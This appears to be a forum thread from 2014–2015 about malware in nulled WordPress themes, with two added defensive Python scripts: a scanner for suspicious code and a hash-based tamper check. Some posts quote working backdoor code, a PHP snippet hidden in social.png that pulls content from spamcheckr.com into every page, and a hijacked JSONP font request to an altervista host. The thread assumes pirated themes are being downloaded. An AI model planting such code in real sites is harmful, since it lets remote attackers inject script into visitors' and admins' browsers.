
08-28-2014, 11:06 AM (This post was last modified: 08-28-2014 01:24 PM by intrepid.)
Post: #51
RE:
Quote:just want to offer my finding

the change from social.png to another name, abc.png

abc can be anything

so

download OP's file, unzip all files
in Windows 7 use folder view > pick > Large icons or Extra large icons view
if you cannot see the png showing any image among the files, you should suspect something is wrong; open it with notepad++
use an online decoder to decode it
then you can clearly see the virus or infection
"pls give REP if this helps you to delete the infection"
running virustotal sometimes may not detect this infection

hope this helps my dear sincere members

Quote:I usually open notepad++ and scan the theme folder for the following:
base64_decode
eval(
mail(
imgur
And also www and http references throughout the theme.

Quote:I've noticed all bulkyfile shares have a "readme.txt" where they usually aren't expected, such as inside the wp-includes folder. Some even four levels deep.

@PUTin-SUp reported this malware activity on August 17th but his/her thread was removed within 1 hour of posting. I know this because I pm'd him. The thread was titled:

[DONT-GET!!!] php include('img/thumb.png'); [!]

<?php
// fires on roughly 1 request in 100, so the injection rarely shows itself
if (mt_rand(0, 99) == 1) {
    function sec1_check() {
        if (function_exists('curl_init')) {
            $url = "spamcheckr.com/req.php";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            // whatever the remote host answers is printed straight into the page <head>
            echo "$data";
        }
    }
    // hooked on wp_head, so it runs on every front-end page load
    add_action('wp_head', 'sec1_check');
}
?>

He stated that... The code is hidden inside the .png files social.png or thumb.png; u can open that file with any text editor to see... before uploading to the server ;)

So, a little help: all releases u get from linkquicks or quicklinkz host are infected, never trust them, these virus-check links are worth zero!!!

u can find this code always in the plugin's main .php files, at the top or at the bottom inside, or in the functions.php file. Watch out for an images/img folder which contains only 1 file inside ** a social.png OR thumb.png ** if u see something like that u can be sure that's infected and should be alarmed.. to solve that, a simple solution is that u never get files from linkzquick/quicklinkz filehost.. the releases also contained a txt file with the *get nulled scripts* name

probably there will be other file names, icon.png or whatever, tomorrow... they are still creative at hiding his bad content...

My question is this: If virustotal is useless, is there a reliable tool or service we can use to find this malware before uploading it to the server? Also, can it infect the database with an SQL injection if the malware script is unknowingly uploaded to the server?

Just read
* wptavern(dot)com/how-to-find-hacked-wordpress-files
* wpbeginner(dot)com/wp-tutorials/how-to-find-a-backdoor-in-a-hacked-wordpress-site-and-fix-it

FYI: I like buying plugins and themes that I use so I'm a group buy advocate. See http://bestblackhatforum.com/Thread-Grou...eme-Loaded
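As an added example that is not part of this thread or of any poster's text, the Python script below automates the manual checks quoted in this post over an extracted theme folder: it reports .png files that lack the PNG signature or contain a PHP open tag, greps PHP/JS for base64_decode(, eval(, mail(, imgur and includes of image files, decodes base64 literals inline (instead of pasting them into an online decoder), lists URLs whose host is not on a small allow-list, and flags readme.txt files that sit below the top level. The allow-list, the readme rule and the sample theme it writes to a temporary directory are my assumptions and constructed data; point scan_tree() at a real folder to use it.

```python
"""Added example: automate the manual checks quoted in this post over an
extracted theme/plugin folder (not code from the thread or from any poster;
the sample files below are constructed)."""
import base64
import binascii
import os
import re
import tempfile
from urllib.parse import urlsplit

# Every real PNG starts with this 8-byte signature; a "png" without it is not an image.
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_TAG = re.compile(rb"<\?php|<\?=", re.IGNORECASE)

# The strings the quoted post greps for, plus a rule for PHP pulling an "image" in as code.
SUSPICIOUS = {
    "base64_decode(": re.compile(rb"\bbase64_decode\s*\("),
    "eval(": re.compile(rb"\beval\s*\("),
    "mail(": re.compile(rb"\bmail\s*\("),
    "imgur": re.compile(rb"imgur", re.IGNORECASE),
    "include of image file": re.compile(
        rb"\b(?:include|require)(?:_once)?\s*\(?\s*['\"][^'\"]*\.(?:png|jpe?g|gif|ico)['\"]",
        re.IGNORECASE),
}
# base64_decode() fed a literal: decode it so the reviewer sees the payload without an online tool.
B64_LITERAL = re.compile(rb"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
URL = re.compile(rb"https?://[A-Za-z0-9.\-]+", re.IGNORECASE)
# Assumption: hosts a theme may legitimately reference; anything else is reported for review.
ALLOWED_HOSTS = {"wordpress.org", "www.googleapis.com", "fonts.googleapis.com", "fonts.gstatic.com"}
CODE_EXT = {".php", ".js", ".html", ".htm", ".css", ".txt"}


def scan_file(path):
    """Return a list of (rule, detail) findings for one file."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    if ext == ".png":
        if not data.startswith(PNG_MAGIC):
            findings.append(("fake png", "no PNG signature"))
        if not PHP_TAG.search(data):
            return findings  # a broken image, but not code
        findings.append(("php in image", "contains a PHP open tag"))
    elif ext not in CODE_EXT:
        return findings
    for rule, pattern in SUSPICIOUS.items():
        for m in pattern.finditer(data):
            findings.append((rule, "line %d" % (data.count(b"\n", 0, m.start()) + 1)))
    for m in B64_LITERAL.finditer(data):
        try:
            decoded = base64.b64decode(m.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue
        findings.append(("decoded base64", decoded.decode("utf-8", "replace")[:80]))
    seen = set()
    for m in URL.finditer(data):
        host = urlsplit(m.group(0).decode("ascii", "replace")).hostname
        if host and host not in ALLOWED_HOSTS and host not in seen:
            seen.add(host)
            findings.append(("external url", host))
    return findings


def scan_tree(root):
    """Walk root and map each flagged file (relative, '/'-separated) to its findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            full = os.path.join(dirpath, fname)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            findings = scan_file(full)
            # Assumption: scanning one extracted theme, where only a top-level readme.txt is expected.
            if fname.lower() == "readme.txt" and "/" in rel:
                findings.append(("stray readme.txt", "nested %d level(s) deep" % rel.count("/")))
            if findings:
                report[rel] = findings
    return report


def build_sample_tree():
    """Write a constructed sample theme (modelled on what the thread describes) to a temp dir."""
    sample = {
        "style.css": b"/* Theme Name: Sample */\n",
        "readme.txt": b"Sample theme\n",
        "img/logo.png": PNG_MAGIC + b"\x00" * 16,  # a real (truncated) PNG
        "img/social.png": b"<?php if (mt_rand(0,99) == 1) { eval(base64_decode('"
                          + base64.b64encode(b"phpinfo();") + b"')); } ?>\n",
        "functions.php": b"<?php\ninclude('img/social.png');\n$u = 'https://fonts.googleapis.com/css';\n",
        "js/fonts.js": b"$.ajax({url: 'http://example-cdn.invalid/google_fonts.php'});\n",
        "inc/readme.txt": b"get nulled scripts\n",
    }
    root = tempfile.mkdtemp(prefix="theme-scan-")
    for rel, content in sample.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, findings in sorted(scan_tree(build_sample_tree()).items()):
        for rule, detail in findings:
            print("%-18s %-22s %s" % (rel, rule, detail))
```

The signature check catches the "png that does not render as an image" case directly, and decoding base64 literals in place shows what an obfuscated call would execute; a clean, vendor-supplied theme should produce an empty report apart from whatever external hosts you decide to add to the allow-list.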
09-01-2014, 03:44 PM
Post: #52
RE:
Hi everyone,

I want to share my recent experience. My whole server is infected with some code implemented in every php file at the beginning of the file. No use cleaning the files, deleting files and inserting new ones, because it is again implemented at the beginning of the file. It attacks only php. The code is very long, has a lot of numbers... I can not find the source.
Wordpress is deactivating the plug-ins because it encounters an invalid header - which is true. And without active plugins, my sites do not work.
I do not know what to do. If anyone has some advice to share...?
09-01-2014, 04:29 PM
Post: #53
RE:
thank you so much rep added
09-28-2014, 07:18 AM
Post: #54
RE:
hi guys

what do you think about this? just found this in bazar 2.43, it's an upload from someone here and from gfxtra.net

i would say this is malicious code?

public function print_ajax_request() {
    $cache = yit_get_model( 'cache' );
    if ( $cache->is_expired( 'google_fonts.json' ) ) :
?>
<script type="text/javascript">
jQuery( document ).ready( function ( $ ) {
    var fonts = null;
    $.ajax({
        // the original Google endpoint is commented out ...
        //url: "https://www.googleapis.com/webfonts/v1/webfonts",
        // ... and replaced by a third-party host; as JSONP, whatever it returns runs as script in wp-admin
        url: "http://niubbys.altervista.org/google_fonts.php",
        dataType: "jsonp",
        success: function( ret ) {
            var data = {
                action: 'retrieve_google_fonts',
                google_fonts : ret
            };

            //since 2.8 ajaxurl is always defined in the admin header and points to admin-ajax.php
            // the third-party response is then stored via admin-ajax.php as the font list
            $.post( ajaxurl, data, function( response ) {} );
        }
    });
});
</script>
<?php
    endif;
} // end of print_ajax_request() (closing brace missing from the pasted fragment)
11-24-2014, 01:02 AM
Post: #55
RE:
Guys, if we would use the MD5 hash string of the original theme to compare it to the one posted here, then we would definitely be able to spot the altered files. I sent a PM to the mods here regarding this and I honestly believe it could eliminate the problem of fake files. In summary my idea is simple. What we will need to do is create a topic where trusted users would post just the hash tags of KNOWN clean theme archive files. Then we can compare the clean MD5 hash string to all the re-ups and supposedly "clean" themes posted here and see if it matches the virgin, original hash string. If it matches then all is clean. If not then the file was altered. The MD5 hash is unique to every file and this method has been used forever to verify keygens by the cracker teams and such. Why not use it for the theme downloads!
There are tons of free and crack3d programs that can calculate an MD5 hash (or sha1 or whatever other unique strings).


Happy Holidays to those who celebrate!
I haven't failed. I just found 10,000 ways that won't work.
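An added example, not from this thread or any poster, of the comparison proposed in the post above, written in Python. It hashes the whole archive as the post suggests and also builds a per-file digest manifest, so that a re-upload that was merely re-zipped (different member timestamps, different compression) can still be checked file by file, and the report names exactly which members were added, removed or edited. It uses SHA-256 rather than MD5, since MD5 collisions are practical and a digest meant to catch tampering should not rely on it. The two archives are constructed in memory; a real check would read the trusted manifest from the reference post and the candidate zip from disk.

```python
"""Added example: verify a re-uploaded theme archive against a trusted one, per
archive (as the post proposes) and per file (not code from the thread; the
sample archives below are constructed)."""
import hashlib
import io
import zipfile

# Constant member timestamps so identical content zips to identical bytes in this demo.
FIXED_TIME = (1980, 1, 1, 0, 0, 0)


def archive_digest(data, algo="sha256"):
    """Single digest of the whole archive, the post's proposal. SHA-256 by default:
    MD5 collisions are practical, so a tamper check should not depend on it."""
    return hashlib.new(algo, data).hexdigest()


def file_manifest(data, algo="sha256"):
    """Per-file digests of every member of a zip held in memory: {member name: hex digest}."""
    manifest = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                manifest[info.filename] = hashlib.new(algo, zf.read(info)).hexdigest()
    return manifest


def diff_manifests(trusted, candidate):
    """Which members were added, removed, or changed relative to the trusted manifest."""
    return {
        "added": sorted(set(candidate) - set(trusted)),
        "missing": sorted(set(trusted) - set(candidate)),
        "modified": sorted(n for n in trusted.keys() & candidate.keys() if trusted[n] != candidate[n]),
    }


def build_zip(files):
    """Constructed sample archive from {member name: bytes}; deterministic so re-packing is comparable."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            info = zipfile.ZipInfo(name, date_time=FIXED_TIME)
            info.compress_type = zipfile.ZIP_DEFLATED
            zf.writestr(info, content)
    return buf.getvalue()


# Constructed: the vendor's clean theme, and a "re-up" with one edited file and one extra file.
CLEAN_FILES = {
    "theme/style.css": b"/* Theme Name: Sample */\n",
    "theme/functions.php": b"<?php\nadd_theme_support('title-tag');\n",
}
REUP_FILES = dict(CLEAN_FILES)
REUP_FILES["theme/functions.php"] = CLEAN_FILES["theme/functions.php"] + b"include('img/social.png');\n"
REUP_FILES["theme/img/social.png"] = b"<?php /* payload would live here */ ?>\n"


def verify_reup(trusted_zip, candidate_zip):
    """Whole-archive comparison alongside the per-file diff that says *what* changed."""
    return {
        "archive_hash_matches": archive_digest(trusted_zip) == archive_digest(candidate_zip),
        "diff": diff_manifests(file_manifest(trusted_zip), file_manifest(candidate_zip)),
    }


if __name__ == "__main__":
    result = verify_reup(build_zip(CLEAN_FILES), build_zip(REUP_FILES))
    print("archive hash matches:", result["archive_hash_matches"])
    for kind, names in result["diff"].items():
        print("%-9s %s" % (kind + ":", ", ".join(names) or "-"))
```

The whole-archive digest only answers "identical or not"; the manifest diff is what tells you that functions.php gained an include and that an img/social.png appeared, which is the kind of change this thread is about.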
12-04-2014, 08:56 AM (This post was last modified: 12-04-2014 08:58 AM by karma1.)
Post: #56
RE:
Hi ;)
I'm reading the different posts in this thread with a lot of attention ! lol !
What to do once nulled script or theme is downloaded ?
1) Extract all files first in a separate folder
2) Scan with your antiviruses (eliminates Trojan, ...)
3) Once this first step is done, install theme on your server (means on your own pc first - w/xamp server or sth else)
4) Add the Wordfence plugin to your Wordpress install and run it! If your theme contains malicious code like base64 code, suspicious php functions or social.png, it will detect it. It will also detect if the Wordpress core has been modified in a suspicious way.
The use of this plugin will save you a lot of time if you want to avoid troubles with nulled themes or scripts. You should always keep in mind that there's nothing better than checking all folders manually, but if you don't have the time or knowledge on how to do it, Wordfence is the right plugin for this task and it's free;)
Hope this helps ;)
+5 rep added for Simey69;)
01-04-2015, 02:04 PM (This post was last modified: 01-04-2015 02:07 PM by vamon.)
Post: #57
RE:
Admin, get' them down:
There has been a thread around with a lot of sharings with different Wordpress-Plugins for "WooCommerce".

I can't find this thread now, sry, but I've downloaded some at once and my AVG reported the "social.png".
Also there had been the php-line at the end of the main-script.

rep +5 because the sheriff is in the town now ;)

Cheers
What goes around, comes around.
01-04-2015, 02:12 PM
Post: #58
RE:
(12-04-2014 08:56 AM)karma1 Wrote:  Hi ;)
I'm reading the different posts in this thread with a lot of attention ! lol !
What to do once nulled script or theme is downloaded ?
1) Extract all files first in a separate folder
2) Scan with your antiviruses (eliminates Trojan, ...)
3) Once this first step is done, install theme on your server (means on your own pc first - w/xamp server or sth else)
4) Add the Wordfence plugin to your Wordpress install and run it! If your theme contains malicious code like base64 code, suspicious php functions or social.png, it will detect it. It will also detect if the Wordpress core has been modified in a suspicious way.
The use of this plugin will save you a lot of time if you want to avoid troubles with nulled themes or scripts. You should always keep in mind that there's nothing better than checking all folders manually, but if you don't have the time or knowledge on how to do it, Wordfence is the right plugin for this task and it's free;)
Hope this helps ;)
+5 rep added for Simey69;)
and +5 for Karma1 for sharing this careless-solution :D
Thought before that Wordfence takes a lot of php-memory, but with this hindsight it doesn't care anymore^^
What goes around, comes around.
02-04-2015, 02:26 AM
Post: #59
RE:
Thanks for this alert OP
02-04-2015, 02:36 AM
Post: #60
RE:
I think all these spammers should be removed or their rights to post should be removed. What do you think http://bestblackhatforum.com/Thread-Spammers--185797